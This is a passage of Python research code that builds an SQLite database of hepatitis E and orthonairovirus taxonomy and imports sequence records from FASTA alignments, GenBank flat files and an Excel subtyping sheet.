nairovirus 1', species, Orthonairovirus_genus, '2034329')\n Pacific_Sp = ct.taxa('Pacific coast tick orthonairovirus', 'Pacific coast tick nairovirus', species, Orthonairovirus_genus, '1977074') # to long: M\n Pustyn_Sp = ct.taxa('Pustyn orthonairovirus', 'Pustyn', species, Orthonairovirus_genus, '1857750')\n Saphire_Sp = ct.taxa('Saphire II orthonairovirus', 'Saphire II virus', species, Orthonairovirus_genus, '1815512')\n SouthBay_Sp = ct.taxa('South Bay orthonairovirus', 'South Bay virus', species, Orthonairovirus_genus, '1526514')\n Uzun_Sp = ct.taxa('Uzun Agach orthonairovirus', 'Uzun Agach virus', species, Orthonairovirus_genus, '1523052')\n Vinegar_Sp = ct.taxa('Vinegar Hill orthonairovirus','Vinegar Hill virus',species, Orthonairovirus_genus,'2059308')\n\n # HEV\n tOrthSpcA= ct.taxa('Orthohepevirus A', 'Orthohepevirus A' , species, tOrthHEV, '1678143', syn=[ 'Swine hepatitis E virus', '63421']) # ?? syn??\n ct.synonyms(tOrthSpcA, '12461')\n tOrthSpcB= ct.taxa('Orthohepevirus B', 'Orthohepevirus B' , species, tOrthHEV, '1678144') # NCBI_ID tentative !!\n tOrthSpcC= ct.taxa('Orthohepevirus C', 'Orthohepevirus C' , species, tOrthHEV, '1678145', syn=['879096', '1414752']) # rat/R63/DEU/2009, Mink\n tOrthSpcD= ct.taxa('Orthohepevirus D', 'Orthohepevirus D' , species, tOrthHEV, '1678146')\n\n\n tPisciSpcA=ct.taxa('Piscihepevirus A', 'Piscihepevirus A' , species, tPisci,'1678146', syn=['1016879']) # Cutthroat trout virus\n\n rGenotype = ct.rank('genotype', species)\n g1 = ct.taxa('1', 'HEV-g1' , rGenotype, tOrthSpcA, '185579', syn=['I', 'GI', 'G1', 'One'] )\n g2 = ct.taxa('2', 'HEV-g2' , rGenotype, tOrthSpcA, syn=['II'] )\n g3 = ct.taxa('3', 'HEV-g3' , rGenotype, tOrthSpcA, '509628', syn=['G3', 'III', 'Gt3', 'g3', 'HEV-3', 'third', 'GIII']) # , 'Hepatitis E virus type 3'\n g4 = ct.taxa('4', 'HEV-g4' , rGenotype, tOrthSpcA, '185580',\n syn=['IV', '689698', '689699', '689700', '689701', '689702', '689703', '4(IV)']) # Hu/03858/HKG/2009, Hu/07598/HKG/2006\n g5 = ct.taxa('5', 'HEV-g5' , rGenotype, tOrthSpcA, syn=['V'] )\n g6 = ct.taxa('6', 'HEV-g6' , rGenotype, tOrthSpcA, syn=['VI'] )\n g7 = ct.taxa('7', 'HEV-g7' , rGenotype, tOrthSpcA, syn=['VII', 'HEV-7' ] )\n\n gC1 = ct.taxa('C1', 'HEV-C1' , rGenotype, tOrthSpcC )\n gC2 = ct.taxa('C2', 'HEV-C2' , rGenotype, tOrthSpcC, syn=['1213422', 'Ferret hepatitis E virus'] )\n\n rank_MajorClade = ct.rank('major clade', rGenotype)\n maI = ct.taxa('I' , 'HEV-g3-I' , rank_MajorClade, g3)\n maII = ct.taxa('II' , 'HEV-g3-II' , rank_MajorClade, g3)\n Rab = ct.taxa('3ra', 'HEV-g3-rabbit', rank_MajorClade, g3)\n\n rank_Group = ct.rank('group', rank_MajorClade)\n grchi = ct.taxa('3chi' , 'HEV-g3chi' , rank_Group, maI)\n grjab = ct.taxa('3jab' , 'HEV-g3jab' , rank_Group, maI)\n grfeg = ct.taxa('3feg' , 'HEV-g3feg' , rank_Group, maII)\n grRab = ct.taxa('3rab' , 'HEV-g3rabbit' , rank_Group, Rab, syn=['Rab'] ) # temporal???\n\n rSubtype = ct.rank('subtype', rank_Group)\n\n g1a = ct.taxa('1a', 'HEV-g1a' , rSubtype, g1, syn=['a', 'Ia', 'IA'])\n g1b = ct.taxa('1b', 'HEV-g1b' , rSubtype, g1)\n g1c = ct.taxa('1c', 'HEV-g1c' , rSubtype, g1)\n g1d = ct.taxa('1d', 'HEV-g1d' , rSubtype, g1, syn=['d'])\n g1e = ct.taxa('1e', 'HEV-g1e' , rSubtype, g1)\n g1f = ct.taxa('1f', 'HEV-g1f' , rSubtype, g1)\n g1g = ct.taxa('1g', 'HEV-g1g' , rSubtype, g1)\n g1h = ct.taxa('1h', 'HEV-g1h' , rSubtype, g1)\n g1i = ct.taxa('1i', 'HEV-g1i' , rSubtype, g1)\n g1j = ct.taxa('1j', 'HEV-g1j' , rSubtype, g1)\n g1k = ct.taxa('1k', 'HEV-g1k' , rSubtype, g1)\n\n g2a = ct.taxa('2a', 'HEV-g2a' , rSubtype, g2)\n\n g3a = ct.taxa('3a', 'HEV-g3a' , rSubtype, grjab, syn=['a'])\n g3b = ct.taxa('3b', 'HEV-g3b' , rSubtype, grjab)\n g3c = ct.taxa('3c', 'HEV-g3c' , rSubtype, grchi, syn=['c', 'G3c'])\n g3d = ct.taxa('3d', 'HEV-g3d' , rSubtype, g3, syn=['d'])\n g3e = ct.taxa('3e', 'HEV-g3e' , rSubtype, grfeg, syn=['e', 'g3e', 'G3E', '3E'])\n g3ef = ct.taxa('3ef', 'HEV-g3ef', rSubtype, grfeg )\n g3f = ct.taxa('3f', 'HEV-g3f' , rSubtype, grfeg, syn=['f', 'g3f', 'G3F', '3F', '515413', '515412']) # human/3f/Fr-27/France/2006, Fr-26/France/2006\n g3g = ct.taxa('3g', 'HEV-g3g' , rSubtype, grfeg)\n g3h = ct.taxa('3h', 'HEV-g3h' , rSubtype, grchi, syn=['h', 'g3h', 'G3H', '3H'])\n g3i = ct.taxa('3i', 'HEV-g3i' , rSubtype, grchi)\n g3j = ct.taxa('3j', 'HEV-g3j' , rSubtype, grjab)\n g3k = ct.taxa('3k', 'HEV-g3k' , rSubtype, g3)\n g3l = ct.taxa('3l', 'HEV-g3l' , rSubtype, g3)\n\n g4a = ct.taxa('4a', 'HEV-g4a' , rSubtype, g4)\n g4b = ct.taxa('4b', 'HEV-g4b' , rSubtype, g4)\n g4c = ct.taxa('4c', 'HEV-g4c' , rSubtype, g4)\n g4d = ct.taxa('4d', 'HEV-g4d' , rSubtype, g4, syn=['d'])\n g4e = ct.taxa('4e', 'HEV-g4e' , rSubtype, g4)\n g4f = ct.taxa('4f', 'HEV-g4f' , rSubtype, g4)\n g4g = ct.taxa('4g', 'HEV-g4g' , rSubtype, g4)\n g4h = ct.taxa('4h', 'HEV-g4h' , rSubtype, g4, syn=['h'])\n g4i = ct.taxa('4i', 'HEV-g4i' , rSubtype, g4)\n g4j = ct.taxa('4j', 'HEV-g4j' , rSubtype, g4)\n g4k = ct.taxa('4k', 'HEV-g4k' , rSubtype, g4)\n\n db.commit()\n\n\ndef build_ref_pos(Seq, beg, end, Al_len):\n sr=0\n ref = [sr]*beg\n for b in Seq:\n if (b != '-'): sr+=1\n ref.append(sr)\n ref += [sr]*(Al_len - end-1)\n return ref\n\n\ndef parse_full_fasta_Align(db, ref_seq = None, file_name=None):\n \"\"\"Will parse an alignment and insert it into the tables:\n files: the file path ,\n align:\n seq: because assume this sequences are all complete original sequences (but may be a partial sequence from\n some isolate ! )\n\n \"\"\"\n if not file_name:\n file_name = filedialog.askopenfilename(filetypes=((\"fasta aligment\", \"*.fas\"), (\"All files\", \"*.*\")),\n defaultextension='fas',\n title='Select Master Alignment')\n if not file_name:\n return\n\n # self.refSeq.clear()\n print(file_name)\n\n c = db.cursor()\n c.execute(\"INSERT INTO seq_file (path, format) VALUES (?, 'fasta')\", (file_name,))\n\n Id_file = c.lastrowid\n c.execute(\"INSERT INTO align (Id_file, Name, Ref ) \"\n \" VALUES (?, ?, ? )\",\n (Id_file, file_name, ref_seq ) )\n\n Id_align = c.lastrowid\n max_len = 0\n for seq_record in SeqIO.parse(file_name, \"fasta\"):\n # print(seq_record.id, len(seq_record) )\n seq = str(seq_record.seq)\n if ref_seq is None: # set first seq as reference\n ref_seq = seq_record.id\n al_ref_seq = seq\n else:\n if ref_seq == seq_record.id:\n al_ref_seq = seq\n ln = len( seq)\n if max_len < ln: max_len = ln\n seq_beg = 0\n seq_end = ln - 1\n while seq_beg < ln:\n if seq[seq_beg] == '-':\n seq_beg += 1\n else:\n break\n while seq_end > seq_beg:\n if seq[seq_end] == '-':\n seq_end -= 1\n else:\n break\n\n seq = str( seq[seq_beg: seq_end + 1])\n\n c.execute(\"SELECT Id_seq FROM seq WHERE seq.Name=?\", (str(seq_record.id),)) # (record.organism,))\n Id_part = c.fetchone()\n Id_part = Id_part[0] if Id_part else None\n if not Id_part:\n exp_seq = seq.replace('-','') #''.join([base for base in seq if base != '-'])\n\n c.execute(\"INSERT INTO seq (Name, Seq, Len ) \"\n \" VALUES (?, ?, ? )\",\n (str(seq_record.id), exp_seq, len(exp_seq)) )\n Id_part = c.lastrowid\n # todo revise: Id_seq_region or Id_part ?????\n c.execute(\"INSERT INTO aligned_seq (Id_align, Id_seq_region, Seq, pbeg, pend ) \"\n \" VALUES (?, ?, ?, ?, ? )\",\n (Id_align, Id_part, seq, seq_beg, seq_end ) )\n\n c.execute(\"UPDATE align SET Al_len = ?, Ref=? WHERE Id_align=?\",\n ( max_len , ref_seq, Id_align ) )\n db.commit()\n return Id_align , build_ref_pos(al_ref_seq,0,len(al_ref_seq)-1, max_len)\n\n\ndef ref_pos(sdb, ID_align, seq_name=None):\n c = sdb.cursor()\n c.execute(\"SELECT Al_len, Ref FROM align WHERE Id_align=? \", (ID_align, ))\n Al_len, Ref = c.fetchone()\n if not seq_name: seq_name = Ref\n c.execute(\"SELECT aligned_seq.Seq, pbeg, pend FROM aligned_seq, Seq \"\n \"ON Id_part=Id_seq WHERE Name=? AND Id_align=?\",\n (seq_name, ID_align ))\n Seq, beg, end = c.fetchone()\n return build_ref_pos(Seq, beg, end, Al_len)\n\n\ndef parse_row(db, row, col):\n success = True\n MEGA_name = row[col['MEGA name']].value\n genotype = row[col['genotype']].value\n subtype = row[col['subtype']].value\n group = row[col['group']].value\n Str_name = row[col['Str.name']].value\n Isolate = row[col['Isolate']].value\n # Country = row[col['Country' ]].value\n Country_cod3=row[col['Country cod']].value\n Region =row[col['region']].value # 'H ' todo: deduced\n Region_full=row[col['region full']].value\n Host =row[col['Host']].value\n Source =row[col['Source']].value\n Year =row[col['Y']].value\n Month =row[col['M']].value\n Day =row[col['D']].value\n Institut =row[col['Inst']].value\n Reference =row[col['reference']].value\n Lu_Li =row[col['Lu, Li']].value\n CG =row[col['CG']].value\n\n c = sdb.cursor()\n taxa = subtype if subtype else group if group else genotype\n c.execute(\"SELECT Id_taxa FROM taxa WHERE taxa.Name=?\", (taxa, )) # ?? Name UNIQUE ??\n Id_taxa = c.fetchone()\n Id_taxa = Id_taxa[0] if Id_taxa else None\n\n if not Isolate: Isolate = Str_name\n\n Id_strain = None\n Id_isolate = None\n Id_seq = None\n strain_Name = None\n isolate_Name = None\n\n # let assume the normal situation where seq name exist, and lets examine strain and isolate.\n c.execute(\"\"\"\n select seq.Id_seq, \n strain.Id_strain, strain.Name, \n\t isolate.Id_isolate, isolate.Name \n\n from seq \n left join isolate_seq USING(Id_seq)\n left join strain USING(Id_strain) \n left join isolate USING(Id_isolate)\n\t\n where seq.Name = ?\n \"\"\"\n , ( MEGA_name, ))\n\n select = c.fetchone()\n if select:\n Id_seq, Id_strain, strain_Name, Id_isolate, isolate_Name = select\n else:\n # there are not seq, but still could be strain and isolate\n print('Unregistered seq ', MEGA_name)\n\n if not Id_strain:\n c.execute(\"select Id_strain from strain where Name = ?\", (Str_name,))\n Id_strain = c.fetchone()\n if Id_strain:\n Id_strain = Id_strain[0]\n c.execute(\"select Id_isolate from isolate where Id_strain = ? and Name=?\"\n , (Id_strain, Isolate))\n Id_isolate = c.fetchone()\n Id_isolate = Id_isolate[0] if Id_isolate else None\n\n if Id_strain:\n if not strain_Name or Str_name != strain_Name:\n print('Renaming? strain of seq ', MEGA_name, ' from ', strain_Name, ' to ', Str_name)\n if not Str_name:\n Str_name = strain_Name # the same with the other fields !!!!!\n st = strain_Name if strain_Name else Str_name\n # update strain\n c.execute(\"UPDATE strain SET Name=? , Id_taxa=?, year=?, host=?, source=?, country_iso3=? where Id_strain=? \"\n , (st , Id_taxa , Year , Host , Source , Country_cod3, Id_strain ) )\n else:\n # create strain\n print('New Strain:', Str_name)\n c.execute(\"INSERT INTO strain (Name , Id_taxa, host, source, year, country_iso3) \"\n \" VALUES (? , ? , ? , ? , ? , ? ) \",\n (Str_name, Id_taxa, Host, Source, Year, Country_cod3))\n Id_strain = c.lastrowid\n\n if Id_isolate:\n if not isolate_Name or Isolate != isolate_Name:\n print('Renaming? isolate of seq ', MEGA_name, ' from ', isolate_Name, ' to ', Isolate)\n if not Isolate:\n Isolate = isolate_Name # the same with the other fields !!!!!\n\n iso = isolate_Name if isolate_Name else Isolate\n c.execute(\"UPDATE isolate SET Name=?, Id_strain=?, year=?, month=?, day=?, host=?, source=?, institution=?, country_iso3=?, region=?, region_full=? where Id_isolate=? \"\n , (iso, Id_strain , Year , Month , Day , Host , Source , Institut , Country_cod3 , Region , Region_full, Id_isolate ))\n else:\n c.execute(\n \"INSERT INTO isolate (Name , Id_strain, Year , Month , Day, host, source, institution, country_iso3, region, region_full ) \"\n \" VALUES (? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? ) \"\n , (Isolate, Id_strain, Year , Month , Day, Host, Source, Institut , Country_cod3, Region, Region_full ))\n Id_isolate = c.lastrowid\n\n # create isolate_seq and strain_isolate\n c.execute(\"INSERT INTO isolate_seq (authority, Id_isolate, Id_seq, Id_strain, Id_taxa, Name , Year , Month , Day, host, source, country_iso3, region, region_full ) \"\n \"VALUES ('AV' , ? ,? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? ) \"\n , ( Id_isolate, Id_seq, Id_strain, Id_taxa, Isolate, Year , Month , Day, Host, Source, Country_cod3, Region, Region_full ))\n Id_isolate_seq= c.lastrowid\n\n c.execute(\"INSERT INTO strain_isolate (authority, Id_strain, Name , Id_isolate_seq) \"\n \" VALUES ('AV' , ? , ? , ? ) \",\n ( Id_strain, Str_name, Id_isolate_seq))\n\n # todo: revise this. Is general??\n c.execute(\"SELECT Id_algseq FROM aligned_seq WHERE Id_part=?\", (Id_seq,))\n Id_algseq= c.fetchone()\n Id_algseq = Id_algseq[0] if Id_algseq else None\n\n if Id_algseq is None:\n #success = abnormal_row(c, row)\n c.execute(\"INSERT INTO pending_seq (Id_taxa, Name, Id_seq, Id_isolate) VALUES (?,?,?,?)\",\n (Id_taxa, MEGA_name, Id_seq, Id_isolate))\n\n # print(\"Abnormal row !!!!! \", MEGA_name, subtype, Str_name,\n # \"-------> Taxa:{0}, Alseq:{1}, Seq:{2}\".format(Id_taxa, Id_algseq, Id_seq))\n success = False\n else:\n c.execute(\"INSERT INTO classified_seq (Id_taxa, Id_algseq) VALUES (?,?) \"\n , (Id_taxa, Id_algseq) )\n # if c.rowcount == 0: return abnormal_row(c, row)\n\n rfs = []\n if Lu_Li : rfs.append( 'Lu' )\n if Reference : rfs.append( 'VR' )\n if Reference=='R': rfs.append( 'ICVT')\n # print (rfs)\n for rf in rfs:\n # print ('Add scheme: ',Id_taxa , rf , Id_seq, MEGA_name )\n c.execute(\"INSERT INTO ref_seq (Id_taxa, Id_ref_schema , Id_seq, name ) \"\n \" VALUES (? , (SELECT Id_ref_schema FROM ref_schema WHERE schema=?), ? , ? ) \"\n , (Id_taxa, rf , Id_seq, MEGA_name ))\n\n # db.commit()\n return success\n\n\ndef parse_HEV_xlsm(db, file_name=None):\n print('openpyxl...')\n import openpyxl\n\n if not file_name:\n file_name = filedialog.askopenfilename(filetypes=((\"Excel files\", \"*.xlsm\"), (\"All files\", \"*.*\")),\n defaultextension='fas',\n title='Select HEV isolate subtyping deta')\n if not file_name:\n return\n\n # self.refSeq.clear()\n print(file_name)\n\n wb = openpyxl.load_workbook(file_name)\n print(wb.sheetnames)\n\n ws = wb['Seq-class'] # 2 ('Seq-class')\n first = True\n error = False\n col=dict()\n for r in ws.iter_rows() :\n if first:\n for c in range(25): # make a dic with the first 25 columns headers\n col[r[c].value]=c\n first = False\n else:\n error |= parse_row(db,r,col)\n if error:\n print('There were errors during parsing the Excel file !!!!!!!!!!!!!!')\n\n db.commit()\n\n\ndef clean_parsed_Excel(db):\n c = db.cursor()\n c.execute(\"DELETE FROM strain\") # ??\n c.execute(\"DELETE FROM isolate\") # ??\n c.execute(\"DELETE FROM isolate_seq\") # ??\n c.execute(\"DELETE FROM pending_seq\") # ??\n c.execute(\"DELETE FROM classified_seq\") # ??\n db.commit()\n\n\ndef parseGB(db, GB_flat_file=None):\n '''\n Load and parse a GenBank sequence flat file\n :return:\n '''\n if not GB_flat_file:\n GB_flat_file = filedialog.askopenfilename(filetypes=((\"Seq flat GB\", \"*.gb\"), (\"All files\", \"*.*\") ),\n title='Parse the GenBank sequences in flat format')\n print(GB_flat_file)\n\n c = db.cursor()\n Id_genotype = rank_ID(c, 'genotype')\n Id_subtype = rank_ID(c, 'subtype')\n\n # no real need to save this info\n c.execute(\"INSERT INTO seq_file (path, format) VALUES (?, 'GB_flat')\", (GB_flat_file,))\n Id_file = c.lastrowid\n with open(GB_flat_file) as GB_flat:\n prev_sub_auth = None\n prev_sub_jour = None\n prev_sub_ID = None\n prev_sub_ref = None\n for record in GenBank.parse(GB_flat):\n\n # record.locus : locus - The name specified after the LOCUS keyword in the GenBank\n # record. This may be the accession number, or a clone id or something else.\n\n Name = record.accession[0] if record.accession else record.locus\n strain = None # record.locus ??\n isolate = None\n host = None\n country = None # colection contry, NO author country\n region = None # colection region, NO author country\n collection_date = None\n year = None\n month = None\n day = None\n source = None\n genotype = None\n subtype = None\n NCBI_TaxID = None\n\n # let assume the normal situation where we are inserting a new seq\n try:\n c.execute(\"INSERT INTO seq (Name, Seq , Len )\"\n \" VALUES (?, ? , ? )\",\n (Name, str(record.sequence), len(record.sequence)))\n Id_seq = c.lastrowid\n\n except sqlite3.IntegrityError:\n print('Atempt to duplicate seq ', Name)\n continue\n\n # http://biopython.org/DIST/docs/api/Bio.GenBank.Record-pysrc.html#Feature\n for feature in record.features:\n if feature.key == 'source':\n # http://biopython.org/DIST/docs/api/Bio.GenBank.Record.Qualifier-class.html\n for q in feature.qualifiers:\n\n if q.key == '/strain=':\n strain = q.value[1:-1].strip()\n\n elif q.key == '/isolate=':\n isolate = q.value[1:-1].strip()\n\n elif q.key == '/country=':\n country = q.value[1:-1].split(':')\n if len(country) > 1:\n region = country[1].strip() # ok?\n country = country[0].strip()\n\n elif q.key == '/collection_date=':\n collection_date = q.value[1:-1].strip()\n year, month, day = parse_date(collection_date)\n\n elif q.key == '/source=' or q.key == '/isolation_source=':\n source = q.value[1:-1].strip()\n\n elif q.key == '/host=':\n host = q.value[1:-1]\n\n elif q.key == '/db_xref=': # example value= taxon:509628\n val = q.value[1:-1]\n m = val.split(':')\n if m[0].startswith ('taxon'):\n NCBI_TaxID = m[1].strip()\n\n elif q.key == '/note=':\n val = q.value[1:-1]\n genotype, subtype = parse_GB_note(val)\n\n\n authors = None\n unp_aut = None\n references = []\n title = None\n sub_date = None\n institution = None\n Id_submission = None\n p_authors = None\n p_country = None\n p_journal = None\n\n for rf in record.references:\n\n if rf.title == 'Direct Submission':\n if prev_sub_auth == rf.authors and prev_sub_jour == rf.journal:\n Id_submission = prev_sub_ID\n references = prev_sub_ref\n break\n else:\n p_authors = rf.authors\n p_journal = rf.journal\n institution = p_journal[24:]\n\n elif rf.journal == 'Unpublished':\n title = rf.journal\n unp_aut = rf.authors\n\n else:\n references.append(rf)\n\n if not Id_submission: # if not like the previous ...\n # look for this authors in existing submissions in DB\n for ID, tl in c.execute(\"SELECT Id_submission, title FROM submission WHERE authors=? \", (p_authors, )):\n if tl == title: # with the same title will be the same submission\n Id_submission = ID\n break\n elif title:\n continue\n else:\n for rf in references: # the submission could uses the title of one of the references\n if tl == rf.title:\n title = rf.title\n Id_submission = ID\n break\n\n if not Id_submission and p_journal: # is a new submission that we can built\n sub_date = p_journal[11:23] # todo: parse ???\n p_country = institution.split(',')[-1]\n if not title:\n title = references[0].title if references else None # lets take the title of the first reference\n c.execute(\n \"INSERT INTO submission ( title, sub_date, authors , country_iso3 )\"\n \" VALUES ( ? , ? , ? , (SELECT iso3 FROM countries WHERE name=? ) )\",\n ( title, sub_date, p_authors, p_country ) )\n Id_submission = c.lastrowid\n prev_sub_auth = p_authors # now this will be the prev sub\n prev_sub_jour = p_journal\n prev_sub_ID = Id_submission\n prev_sub_ref = references\n\n for rf in references: # very often this is empty. Add to every seq referenced\n try:\n c.execute(\n \"INSERT INTO reference ( title , authors, journal , medline_id, number, pubmed_id, remark) \"\n \" VALUES ( ? , ? , ? , ? , ? , ? , ? )\",\n ( rf.title, rf.authors, rf.journal, rf.medline_id, rf.number, rf.pubmed_id, rf.remark))\n reference_id = c.lastrowid\n\n except sqlite3.IntegrityError:\n c.execute(\"SELECT reference_id FROM reference WHERE title=? AND authors=? AND journal=?\",\n (rf.title, rf.authors, rf.journal))\n reference_id = c.fetchone()[0]\n # reference_id = reference_id[0] if reference_id else reference_id\n\n c.execute(\n \"INSERT INTO reference_to_seq ( location, reference_id , Id_seq ) \"\n \" VALUES ( ? , ? , ? )\",\n (rf.bases, reference_id , Id_seq ))\n\n Id_taxa = find_ID_Taxa(c, NCBI_TaxID, genotype, subtype, Id_genotype, Id_subtype)\n # Id_rank = rank_ID_taxa(c, Id_taxa)\n\n c.execute(\"SELECT iso3 FROM countries LEFT JOIN country_names USING (iso3) \"\n \"WHERE countries.name=? or countries.full_name=? OR country_names.name=?\", (country, country, country))\n country_iso3 = c.fetchone()\n if not country_iso3:\n if country: print('Not found country: ', country)\n elif region: print('Seq ', Name, ' have no country, but region:', region)\n country_iso3 = None\n else:\n country_iso3 = country_iso3[0]\n\n\n host_t, source_t = parse_source(host, source)\n # print('host_t, source_t = parse_source(host, source): ', host_t, source_t, host, source)\n # todo: parse location. Is unique?\n\n isolate, strain = reuse_GBdefinition_to_find_strain_isolate(record.definition, isolate, strain)\n if not strain: strain = isolate\n if not isolate: isolate = strain\n if not strain:\n strain = Name\n isolate = record.locus\n\n # there could be strain and isolate, unfortunately most of the time with the same name\n Id_strain = None\n Id_isolate = None\n\n c.execute(\"select Id_strain from strain where Name = ?\", (strain,))\n Id_strain = c.fetchone()\n\n if not Id_strain:\n # the normal situation: a new strain\n c.execute(\"INSERT INTO strain (Name , Id_taxa, host , source , year, country_iso3) \"\n \" VALUES (? , ? , ? , ? , ? , ? ) \",\n (strain, Id_taxa, host_t, source_t, year, country_iso3))\n Id_strain = c.lastrowid\n else:\n # TENTATIVELY we considere it is the same strain, just these strain have seq already\n # print('Existing Strain:', strain, Id_strain ) # todo: check this !!!\n # c.execute(\"UPDATE strain (Name) VALUES (?) \", (strain,)) # todo: update here !!!!!!!!\n # todo: for example - a more precise genotyping\n # Id_strain = c.lastrowid\n # print(' new Id_strain:', Id_strain, )\n Id_strain = Id_strain[0]\n\n # select other fields to update if possible\n c.execute(\"select Id_isolate from isolate where Id_strain = ? and Name=?\"\n , ( Id_strain, isolate ) )\n Id_isolate = c.fetchone()\n if Id_isolate:\n # a new seq for that isolate of that strain\n # print('Existing isolate:', isolate, Id_isolate )\n # c.execute(\"UPDATE isolate (Name) VALUES (?) \", ( isolate,)) # todo: update here !!!!!!!!\n # Id_isolate = c.lastrowid\n Id_isolate = Id_isolate[0]\n\n if not Id_isolate:\n # normal situation: a new isolate for that strain\n c.execute(\n \"INSERT INTO isolate (Name , Id_strain, col_date , Year , Month , Day, host , source , authors , institution, country_iso3, region_full ) \"\n \" VALUES (? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? ) \"\n , (isolate, Id_strain, collection_date, year , month , day, host_t, source_t, p_authors, institution, country_iso3, region))\n Id_isolate = c.lastrowid\n\n # create isolate_seq and strain_isolate\n c.execute(\"INSERT INTO isolate_seq (authority, Id_isolate, Id_seq, Id_submission, Id_strain, Id_taxa, Name , col_date , year , month , day, host , source , host_ori, source_ori, country_iso3, region_full) \"\n \"VALUES ('GB' , ? ,? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? ) \"\n , ( Id_isolate, Id_seq, Id_submission, Id_strain, Id_taxa, isolate, collection_date, year , month , day, host_t, source_t, host , source , country_iso3, region ))\n Id_isolate_seq= c.lastrowid\n\n c.execute(\"INSERT INTO strain_isolate (authority, Id_strain, Name , Id_isolate_seq) \"\n \" VALUES ('GB' , ? , ? , ? ) \",\n ( Id_strain, strain, Id_isolate_seq) )\n\n c.execute(\"INSERT INTO pending_seq (Name, Id_taxa, description , Id_isolate, Id_seq) \"\n \" VALUES (? , ? , ? , ? , ?) \",\n (Name, Id_taxa, record.definition, Id_isolate, Id_seq))\n\n db.commit()\n\n\ndef find_ID_Taxa(db_cursor, NCBI_TaxID, genotype, subtype, Id_genotype, Id_subtype ):\n #taxa = subtype if subtype else genotype\n NCBI_Taxa_ID = None\n genotype_Taxa_ID = None\n subtype_Taxa_ID = None\n\n if NCBI_TaxID:\n db_cursor.execute(\"SELECT Id_taxa FROM taxa_names WHERE Name=?\", (NCBI_TaxID,))\n NCBI_Taxa_ID= db_cursor.fetchone() # unique ??\n if not NCBI_Taxa_ID:\n print('No NCBI_Id found: NCBI_TaxID, genotype, subtype -> ', NCBI_TaxID, genotype, subtype)\n NCBI_Taxa_ID = None\n elif len(NCBI_Taxa_ID)!=1:\n print('Multiple NCBI_Id found: NCBI_Taxa_ID, NCBI_TaxID, genotype, subtype -> ', NCBI_Taxa_ID, NCBI_TaxID, genotype, subtype)\n NCBI_Taxa_ID = None\n else:\n NCBI_Taxa_ID = NCBI_Taxa_ID[0]\n\n if genotype:\n if NCBI_Taxa_ID:\n db_cursor.execute(\"SELECT Id_taxa FROM taxa_names JOIN taxa USING(Id_taxa) JOIN taxa_parents USING(Id_taxa) \"\n \"WHERE taxa_names.Name=? AND taxa.Id_rank=? AND taxa_parents.parent=?\",\n ( genotype, Id_genotype, NCBI_Taxa_ID) )\n else:\n db_cursor.execute(\"SELECT Id_taxa FROM taxa_names JOIN taxa USING(Id_taxa) \"\n \"WHERE taxa_names.Name=? AND taxa.Id_rank=? \",\n ( genotype, Id_genotype ))\n genotype_Taxa_ID = db_cursor.fetchone() # unique ??\n if not genotype_Taxa_ID:\n if not subtype:\n #print('Swap genotype to subtype: NCBI_TaxID, genotype, subtype -> ', NCBI_TaxID, genotype, subtype)\n return find_ID_Taxa(db_cursor, NCBI_TaxID, None, genotype, Id_genotype, Id_subtype )\n print('Genotype not found: NCBI_TaxID, genotype, subtype -> ', NCBI_TaxID, genotype, subtype)\n genotype_Taxa_ID = None\n elif len(genotype_Taxa_ID)!=1:\n print('Multiple genotype found: genotype_Taxa_ID, NCBI_TaxID, genotype, subtype -> ',\n genotype_Taxa_ID, NCBI_TaxID, genotype, subtype)\n genotype_Taxa_ID = None\n else:\n genotype_Taxa_ID = genotype_Taxa_ID[0]\n\n if subtype:\n if genotype_Taxa_ID:\n if NCBI_Taxa_ID:\n db_cursor.execute(\n \"SELECT Id_taxa FROM taxa_names \"\n \" JOIN taxa USING(Id_taxa) \"\n \" JOIN taxa_parents AS pg USING(Id_taxa) \"\n \" JOIN taxa_parents AS pn USING(Id_taxa) \"\n \"WHERE taxa_names.Name=? \"\n \" AND taxa.Id_rank=? \"\n \" AND pg.parent=?\"\n \" AND pn.parent=?\",\n (subtype, Id_subtype, genotype_Taxa_ID, NCBI_Taxa_ID))\n else:\n db_cursor.execute(\n \"SELECT Id_taxa FROM taxa_names \"\n \" JOIN taxa USING(Id_taxa) \"\n \" JOIN taxa_parents AS pg USING(Id_taxa) \"\n \"WHERE taxa_names.Name=? \"\n \" AND taxa.Id_rank=? \"\n \" AND pg.parent=?\",\n (subtype, Id_subtype, genotype_Taxa_ID))\n else:\n if NCBI_Taxa_ID:\n db_cursor.execute(\n \"SELECT Id_taxa FROM taxa_names \"\n \" JOIN taxa USING(Id_taxa) \"\n \" JOIN taxa_parents AS pn USING(Id_taxa) \"\n \"WHERE taxa_names.Name=? \"\n \" AND taxa.Id_rank=? \"\n \" AND pn.parent=?\",\n (subtype, Id_subtype, NCBI_Taxa_ID))\n else:\n db_cursor.execute(\n \"SELECT Id_taxa FROM taxa_names \"\n \" JOIN taxa USING(Id_taxa) \"\n \"WHERE taxa_names.Name=? \"\n \" AND taxa.Id_rank=? \",\n (subtype, Id_subtype))\n\n subtype_Taxa_ID = db_cursor.fetchone() # unique ??\n if not subtype_Taxa_ID:\n print('No subtype found: NCBI_TaxID, genotype, subtype -> ', NCBI_TaxID, genotype, subtype)\n subtype_Taxa_ID = None\n elif len(subtype_Taxa_ID) != 1:\n print('Multiple subtype found: subtype_Taxa_ID, NCBI_TaxID, genotype, subtype -> ',\n subtype_Taxa_ID, NCBI_TaxID, genotype, subtype)\n subtype_Taxa_ID = None\n else:\n subtype_Taxa_ID = subtype_Taxa_ID[0]\n\n if subtype_Taxa_ID :\n return subtype_Taxa_ID\n\n if genotype_Taxa_ID:\n return genotype_Taxa_ID\n elif genotype:\n return find_ID_Taxa(db_cursor, NCBI_TaxID, None, genotype, Id_genotype, Id_subtype )\n\n if NCBI_Taxa_ID : return NCBI_Taxa_ID\n\n\ndef reuse_GBdefinition_to_find_strain_isolate(definition, isolate, strain):\n if 'isolate' in definition:\n iso = definition.split('isolate')[1].split(',')[0]\n if iso[0] == ':':\n iso = iso[1:].strip()\n iso = iso.split()[0].strip()\n if iso[-1] == '.':\n iso = iso[:-1].strip()\n if isolate == '':\n isolate = iso\n else:\n if isolate != iso:\n isolate = isolate + ' or ' + iso\n if 'strain' in definition:\n st = definition.split('strain')[1].split(',')[0]\n if st[0] == ':':\n st = st[1:].strip()\n st = st.split()[0].strip()\n if 